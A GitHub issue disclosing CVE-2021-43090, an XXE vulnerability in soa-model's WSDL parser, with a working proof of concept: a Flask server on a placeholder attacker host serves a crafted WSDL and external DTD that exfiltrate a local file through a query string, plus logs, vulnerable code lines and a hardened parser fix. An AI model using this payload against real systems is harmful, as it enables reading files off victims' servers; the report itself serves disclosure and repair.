CVE-2021-43090: There is an XXE vulnerability in parsing wsdl. · Issue #281 · membrane/soa-model
An XML External Entity (XXE) vulnerability exists in all versions of soa-model (as of 11.01/2021) in the WSDLParser function.
There is an XXE vulnerability in parsing wsdl.
Add the latest version of soa-model-core to pom.xml:
```xml
<!-- https://mvnrepository.com/artifact/com.predic8/soa-model-core -->
<dependency>
    <groupId>com.predic8</groupId>
    <artifactId>soa-model-core</artifactId>
    <version>1.6.3</version>
</dependency>
```
The XXE vulnerability appears when a remote wsdl file is fetched and parsed:
```java
import com.predic8.wsdl.*;

public class testxxe {
    public static void main(String[] args) {
        WSDLParser parser = new WSDLParser();
        // "ip" is the placeholder for the attacker-controlled host used throughout this report
        Definitions defs = parser.parse("http://ip:10000/testxxeService?wsdl");
    }
}
```
Construct a server that serves the evil wsdl file using Flask:
```python
from flask import Flask, Response

app = Flask(__name__)


# The "wsdl" the victim fetches: its internal subset pulls in an external DTD
# from the attacker host, which carries the actual exfiltration chain.
@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://ip:10000/data.dtd">
%dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)


# The external DTD: %file; is expanded into the URL of the %send; entity, so the
# victim parser leaks the file contents in the query string of its next request.
# The inner "%" is written as &#x25; because a literal "%" inside an entity value
# is itself read as a parameter-entity reference and would not be well-formed.
@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://ip:10000/?filecontent=%file;'>">
%int;
%send;"""
    return Response(xml, mimetype='text/xml', status=200)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
```
Create a test file /tmp/123
```
$ echo 123123 > /tmp/123
$ cat /tmp/123
123123
```
Run the Java code; the XXE attack succeeds:
```
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /testxxeService?wsdl HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /data.dtd HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /?filecontent=123123 HTTP/1.1" 404 -
```
core/src/main/groovy/com/predic8/schema/Include.groovy, line 42:
```groovy
def incToken = XMLInputFactory.newInstance().createXMLStreamReader(resource)
```
core/src/main/groovy/com/predic8/soamodel/AbstractParser.groovy, line 51:
```groovy
XMLInputFactory.newInstance().createXMLStreamReader(res)
```
Reference https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report
XMLInputFactory allows DTD loading, so there is an XXE vulnerability.
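Added example, not soa-model's code and not the reporter's: a stand-alone Java program that puts the factory configuration behind the two quoted lines (`XMLInputFactory.newInstance()` with platform defaults) beside a hardened one that turns off DTD processing, turns off external entities and installs a resolver that refuses every lookup. The WSDL string is a constructed copy of the payload served by the Flask route above, and the class and method names (`StaxXxeDemo`, `defaultFactory`, `hardenedFactory`, `parse`) are chosen here. Whether the hardened parse ends in an `XMLStreamException` or merely reports `&send;` as an undeclared entity depends on the StAX implementation on the classpath; what matters, and what to check with a listener on the DTD host, is that `http://ip:10000/data.dtd` is never requested.

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLResolver;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import java.io.StringReader;

/**
 * Added example (not soa-model code): a default XMLInputFactory, as used in
 * Include.groovy and AbstractParser.groovy, beside one configured to refuse
 * DTD processing and external entities.
 */
public class StaxXxeDemo {

    // Constructed stand-in for the WSDL served by the Flask server in the report.
    // The DTD URL is the same placeholder used there.
    static final String EVIL_WSDL =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE data [\n"
        + "<!ENTITY % dtd SYSTEM \"http://ip:10000/data.dtd\">\n"
        + "%dtd;\n"
        + "]>\n"
        + "<data>&send;</data>";

    /** What the vulnerable code does: a factory with the platform StAX defaults. */
    static XMLInputFactory defaultFactory() {
        return XMLInputFactory.newInstance();
    }

    /** Hardened factory: no DTD processing, no external entities, no resolution at all. */
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        // Disables DTD processing; the parameter-entity chain in the payload never runs.
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        // Belt and braces for implementations that still read the DTD: never resolve
        // external general entities such as &send;.
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        // Last line of defence: any attempt to fetch an external DTD or entity fails loudly.
        f.setXMLResolver(new XMLResolver() {
            @Override
            public Object resolveEntity(String publicID, String systemID,
                                        String baseURI, String namespace)
                    throws XMLStreamException {
                throw new XMLStreamException("external entity resolution refused: " + systemID);
            }
        });
        return f;
    }

    /** Drains the stream and returns the character content seen, or null if parsing fails. */
    static String parse(XMLInputFactory factory, String xml) {
        try {
            XMLStreamReader r = factory.createXMLStreamReader(new StringReader(xml));
            StringBuilder text = new StringBuilder();
            while (r.hasNext()) {
                if (r.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(r.getText());
                }
            }
            return text.toString();
        } catch (XMLStreamException e) {
            System.out.println("parse refused: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        // With the default factory the parser tries to fetch http://ip:10000/data.dtd as
        // soon as it reaches %dtd; (the first GET in the Flask log). Run on an isolated host.
        System.out.println("default: " + parse(defaultFactory(), EVIL_WSDL));
        // With the hardened factory the DOCTYPE is not processed, so no request leaves the JVM.
        System.out.println("hardened: " + parse(hardenedFactory(), EVIL_WSDL));
    }
}
```

The fix for the two quoted lines is to build one hardened factory like `hardenedFactory()` and use it in place of the bare `XMLInputFactory.newInstance()` calls in Include.groovy and AbstractParser.groovy; a WSDL or schema that legitimately needs a DTD is rare enough that failing closed is the right default for a parser pointed at remote URLs.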